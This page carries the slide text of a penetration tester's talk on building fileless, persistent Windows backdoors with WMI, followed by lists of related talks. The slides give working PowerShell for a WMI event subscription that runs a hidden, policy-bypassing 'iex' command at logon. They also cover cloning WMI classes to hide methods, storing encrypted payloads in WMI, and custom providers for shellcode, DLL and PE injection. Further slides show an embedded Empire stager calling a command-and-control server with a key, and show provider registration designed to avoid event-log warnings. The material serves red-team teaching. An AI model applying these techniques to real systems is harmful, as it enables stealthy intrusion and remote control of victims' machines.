SlideShare a Scribd company logo

BUILD BETTER BACKDOORS WITH WMI

A
Alexander Polce Leary

This document discusses using Windows Management Instrumentation (WMI) to create fileless backdoors and persistent implants. It begins with an overview of WMI and its class structure. It then covers duplicating existing WMI classes to hide backdoor methods and storing payloads in WMI properties. The document also introduces creating custom WMI providers using .NET to implement backdoor functionality directly in WMI. It concludes by examining options for registering custom WMI providers, including manually registering through WMI calls to avoid event log warnings. In summary, the document explores abusing WMI's class inheritance and provider models to develop advanced fileless and persistent backdoors on Windows systems.

Technology
1 of 47
BUILDING BETTER BACKDOORS WITH WMI
2 Confidential & Proprietary WHO AM I  Alexander Polce Leary  Senior Network & Application Pentester at NetSPI  Twitter: 0xbadjuju  KeyBase: 0xbadjuju  Blogs: https://blog.netspi.com/author/aleary/  Code: https://github.com/0xbadjuju/
3 Confidential & Proprietary OUTLINE 1. WMI Overview 2. Fileless Backdoors 3. WMI for Storage 4. WMI Providers 5. Installing WMI Providers https://github.com/0xbadjuju/PowerProvider https://github.com/0xbadjuju/WheresMyImplant
4 Confidential & Proprietary WHAT IS WMI?  Windows Management Instrumentation  Present since Windows 95  It shows  Probably familiar with some WMI functions  Win32_Process -> Create()  wmic.exe process call create …  Invoke-WmiMethod –class win32_process –name create –argumentlist …
5 Confidential & Proprietary WMI OVERVIEW  WMI  Namespace  Class  Property  Static || Dynamic  Method  WQL  SELECT * from class;  SQL Server  Database  Table  Row  Static  Stored Procedure  SQL  SELECT * FROM table;
6 Confidential & Proprietary6 Confidential & Proprietary FILELESS BACKDOORS INVOKE-WMIDUPLICATECLASS
7 Confidential & Proprietary WMI CLASS INHERITANCE  WMI has a robust implementation of class inheritance  CIM_ManagedSystemElement  CIM_LogicalElement  CIM_Process  Win32_Process  ???
8 Confidential & Proprietary DUPLICATING A WMI CLASS $NewManagementClass = $ManagementClass.Derive($DerivedClassName) $NewManagementClass.put() $NewManagementClass = $ManagementClass.Clone($ClonedClassName) $NewManagementClass.put() https://twitter.com/mattifestation/status/907702749193633792
9 Confidential & Proprietary HIDING WMI METHODS Invoke-WMIDuplicateClass -TargetClassName Win32_Process -DuplicateClassName Win32_Create -ComputerName $ComputerName -Credential $Credential
10 Confidential & Proprietary
11 Confidential & Proprietary Binding WMI FILELESS BACKDOORS  EventFilter  __EventFilter  Consumers  ComandLineEventConsumer  ActiveScriptEventConsumer  Binding  __FilterToConsumberBinding  Well Known and Documented Technique  https://github.com/Sw4mpf0x/PowerLurk  https://blog.netspi.com/ Event Filter (Trigger) Consumer (Action)
12 Confidential & Proprietary EVENT FILTER + CONSUMER EXAMPLE $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{ EventNamespace = 'root/cimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
13 Confidential & Proprietary INVOKE-WMIDUPLICATECLASS Invoke-WMIDuplicateClass -TargetClassName CommandLineEventConsumer -DuplicateClassName DerivedEventConsumer -NameSpace ROOTSubscription ComputerName $ComputerName -Credential $Credential –Verbose $Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{ EventNamespace = 'rootcimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace rootsubscription -Class DerivedEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
14 Confidential & Proprietary
15 Confidential & Proprietary15 Confidential & Proprietary WMI FOR STORAGE INVOKE-WMIFS
16 Confidential & Proprietary INVOKE-WMIFS 1. Create a WMI class to store file in  New-WMIFSClass 2. Read in file and base64 encode and encrypt  ConvertTo-Base64 & ConvertTo-EncryptedText 3. Slice the base64 encoded string and insert into WMI  Invoke-InsertFileThreaded 4. Retrieve the file and reassemble  Invoke-RetrieveFile 5. Base64, decrypt file, and optionally write to disk  ConvertFrom-Base64 & ConvertFrom-EncryptedText Wrapped into Invoke-WMIUpload & Invoke-WMIRemoteExtract
17 Confidential & Proprietary
18 Confidential & Proprietary18 Confidential & Proprietary WMI PROVIDERS WHERESMYIMPLANT
19 Confidential & Proprietary WMI PROVIDERS  These are the DLL’s behind the scenes that do all the work  Host the methods and properties that we call  cimwin32.dll  What about building our own provider?  Build the provider  Register the provider  Access the provider
20 Confidential & Proprietary HOW TO CREATE A PROVIDER  WmiPrvSe.exe can host the Common Language Runtime (CLR)  Opens up .Net for use in WMI  Add a few decorators to a class and your done  [ManagementEntity]  [ManagementTask] https://gist.github.com/0xbadjuju/550fb602a8b7aa610436d533c94a1885
21 Confidential & Proprietary BASIC BACKDOOR  Command Execution  ShellCode Runner  Dll Injector  PE Injector https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider https://github.com/subTee/EvilWMIProvider
22 Confidential & Proprietary
23 Confidential & Proprietary BASIC WMI BACKDOOR
24 Confidential & Proprietary
25 Confidential & Proprietary BETTER WMI BACKDOOR  Store Payload as Base64 Encoded String in WMI, and then inject the payload  ShellCode Runner  Dll Injector  PE Injector
26 Confidential & Proprietary BETTER WMI BACKDOOR
27 Confidential & Proprietary
28 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Stager? Why not? $language = “powershell” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
29 Confidential & Proprietary EMPIRE – POWERSHELL AGENT
30 Confidential & Proprietary
31 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Agent? Why not? $language = “dotnet” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
32 Confidential & Proprietary EMPIRE - .NET AGENT
33 Confidential & Proprietary33 Confidential & Proprietary REGISTERING WMI PROVIDERS INSTALL-WMIPROVIDER
34 Confidential & Proprietary INSTALLUTIL.EXE PS C:> InstallUtil.exe assembly.dll PS C:> InstallUtil.exe /u assembly.dll In the Windows Event Log this triggers a warning.
35 Confidential & Proprietary
36 Confidential & Proprietary
37 Confidential & Proprietary .NET MANAGEDINSTALLERCLASS PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @( "C:assembly.dll") ) PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @(“/u”, "C:assembly.dll") ) The PS version and .net assembly version need to match. In the Windows Event Log this also triggers a warning.
38 Confidential & Proprietary
39 Confidential & Proprietary
40 Confidential & Proprietary MANUAL REGISTRATION  What if we were to register the WMI Provider purely through WMI calls  This does not come close to fitting on a slide 1. Create the WMI_extension Class 2. Create an instance of WMI_extension for the Win32_Implant Class 3. Create an instance of __InstanceProviderRegistration for WMI_extension 4. Create an instance of __MethodProviderRegistration for WMI_extension 5. Create the Win32_Implant Class 6. Register WMI_extension in HKCR and HKLM
41 Confidential & Proprietary MANUAL REGISTRATION That looks hard
42 Confidential & Proprietary MANUAL REGISTRATION It was
43 Confidential & Proprietary MANUAL REGISTRATION Why would I want to do that?  Manually registering a WMI provider allows us to bypass calling any executables on the remote system  Remember those pesky Windows Event Logs warnings?  Those are caused by the default hosting model LocalSystemHost  There are many, many others to choose from.  Win32_Process -> Create() uses NetworkServiceHost  Wanna guess that that HostingModel doesn’t do?
44 Confidential & Proprietary MANUAL REGISTRATION Install-WMIProviderExtension -ComputerName $ComputerName -Credential $Credential -RemoteLibraryLocation C:WindowsSystem32wbemWheresMyImplant.dll -ProviderDisplayName Win32_Implant -HostingModel NetworkServiceHost:CLR
45 Confidential & Proprietary
46 Confidential & Proprietary
47 Confidential & Proprietary Questions?

Recommended

A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat Security Conference
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active DirectorySunny Neo
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)Will Schroeder
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"Will Schroeder
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 

Recommended

A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat Security Conference
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active DirectorySunny Neo
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)Will Schroeder
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"Will Schroeder
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahOWASP Delhi
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Abusing Symlinks on Windows
Abusing Symlinks on WindowsAbusing Symlinks on Windows
Abusing Symlinks on WindowsOWASP Delhi
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouDouglas Bienstock
 
IDOR Know-How.pdf
IDOR Know-How.pdfIDOR Know-How.pdf
IDOR Know-How.pdfBhashit Pandya
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]RootedCON
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxJulian Catrambone
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
FIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO Alliance
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedAlex Davies
 

More Related Content

What's hot

aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahOWASP Delhi
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Abusing Symlinks on Windows
Abusing Symlinks on WindowsAbusing Symlinks on Windows
Abusing Symlinks on WindowsOWASP Delhi
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouDouglas Bienstock
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]RootedCON
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxJulian Catrambone
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
FIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO Alliance
 

What's hot (20)

aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Abusing Symlinks on Windows
Abusing Symlinks on WindowsAbusing Symlinks on Windows
Abusing Symlinks on Windows
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can You
 
IDOR Know-How.pdf
IDOR Know-How.pdfIDOR Know-How.pdf
IDOR Know-How.pdf
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of Linux
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
FIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO2 Specifications Overview
FIDO2 Specifications Overview
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
 

Viewers also liked

SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedAlex Davies
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...Puppet
 
WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017Alexander Polce Leary
 
Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Frode Hommedal
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...Chris Thompson
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamKeeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamPriyanka Aash
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniquesSymantec Security Response
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalPacSecJP
 

Viewers also liked (14)

SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
 
WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017
 
Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamKeeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
 
Catching fileless attacks
Catching fileless attacksCatching fileless attacks
Catching fileless attacks
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-final
 

Similar to BUILD BETTER BACKDOORS WITH WMI

Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-VLai Yoong Seng
 
Introduction To Managing VMware With PowerShell
Introduction To Managing VMware With PowerShellIntroduction To Managing VMware With PowerShell
Introduction To Managing VMware With PowerShellHal Rottenberg
 
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...VMworld
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...OW2
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Advanced Pen Testing Techniques-DNS-WMI
Advanced Pen Testing Techniques-DNS-WMIAdvanced Pen Testing Techniques-DNS-WMI
Advanced Pen Testing Techniques-DNS-WMICore Security
 
Win32 Perl Wmi
Win32 Perl WmiWin32 Perl Wmi
Win32 Perl Wmiddn123456
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershellMihir Shah
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
Integrating Security Roles into Microsoft Silverlight Applications
Integrating Security Roles into Microsoft Silverlight ApplicationsIntegrating Security Roles into Microsoft Silverlight Applications
Integrating Security Roles into Microsoft Silverlight ApplicationsDan Wahlin
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetAchieve Internet
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Velocidex Enterprises
 
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery Manager
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery ManagerVMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery Manager
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery ManagerVMworld
 
Malware Analysis and Defeating using Virtual Machines
Malware Analysis and Defeating using Virtual MachinesMalware Analysis and Defeating using Virtual Machines
Malware Analysis and Defeating using Virtual Machinesintertelinvestigations
 

Similar to BUILD BETTER BACKDOORS WITH WMI (20)

2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools
 
Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-V
